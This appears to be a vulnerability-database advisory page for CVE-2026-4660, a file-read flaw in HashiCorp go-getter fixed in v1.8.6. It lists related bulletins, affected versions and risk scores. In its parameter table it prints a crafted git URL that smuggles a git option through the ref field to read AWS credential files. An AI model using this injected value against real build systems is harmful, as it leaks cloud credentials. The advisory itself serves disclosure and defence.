CVE-2026-4660

🗓️ 09 Apr 2026 13:47:46Reported by HashiCorpType

cve🔗 web.nvd.nist.gov👁 9 Views🌐 WEB

CVE-2026-4660: Go-getter up to v1.8.5 may allow file reads via crafted git URLs; fixed in v1.8.6.

Reporter	Title	Published	Views	Family All 76
GithubExploit	Exploit for CVE-2026-4660	10 Apr 202620:15	–	githubexploit
IBM Security Bulletins	Security Bulletin: Go-getter may allow to arbitrary filesystem reads through git operations	16 Apr 202618:58	–	ibm
ATTACKERKB	CVE-2026-4660	9 Apr 202613:47	–	attackerkb
Chainguard	CVE-2026-4660 vulnerabilities	11 Apr 202602:19	–	cgr
Circl	CVE-2026-4660	9 Apr 202614:23	–	circl
CNNVD	HashiCorp go-getter 安全漏洞	9 Apr 202600:00	–	cnnvd
Cvelist	CVE-2026-4660 Go-getter may allow to arbitrary filesystem reads through git operations	9 Apr 202613:47	–	cvelist
Debian CVE	CVE-2026-4660	9 Apr 202613:47	–	debiancve
EUVD	EUVD-2026-20894	9 Apr 202615:35	–	euvd
Github Security Blog	HashiCorp's go-getter library may allow arbitrary file reads	9 Apr 202615:35	–	github

[
  {
    "defaultStatus": "unaffected",
    "platforms": [
      "64 bit",
      "32 bit",
      "x86",
      "ARM",
      "MacOS",
      "Windows",
      "Linux"
    ],
    "product": "Tooling",
    "repo": "https://github.com/hashicorp/go-getter",
    "vendor": "HashiCorp",
    "versions": [
      {
        "lessThan": "1.8.6",
        "status": "affected",
        "version": "0",
        "versionType": "semver"
      }
    ]
  }
]

Source	Link
discuss	www.discuss.hashicorp.com/t/hcsec-2026-04-go-getter-may-allow-to-arbitrary-filesystem-reads-through-git-operations/77311

Parameter	Position	Path	Description	CWE
ref=--pathspec-from-file=/home/runner/.aws/credentials	nested	git::https://github.com/attacker/tf-internal.git?ref=--pathspec-from-file=/home/runner/.aws/credentials	Go-getter uses a malicious Git pathspec via ref to read arbitrary files during checkout in a nested module.	CWE-200

17 Apr 2026 17:57Current

6Medium risk

Vulners AI Score6

CVSS 3.17.5

EPSS0.00016

SSVC

CWE-200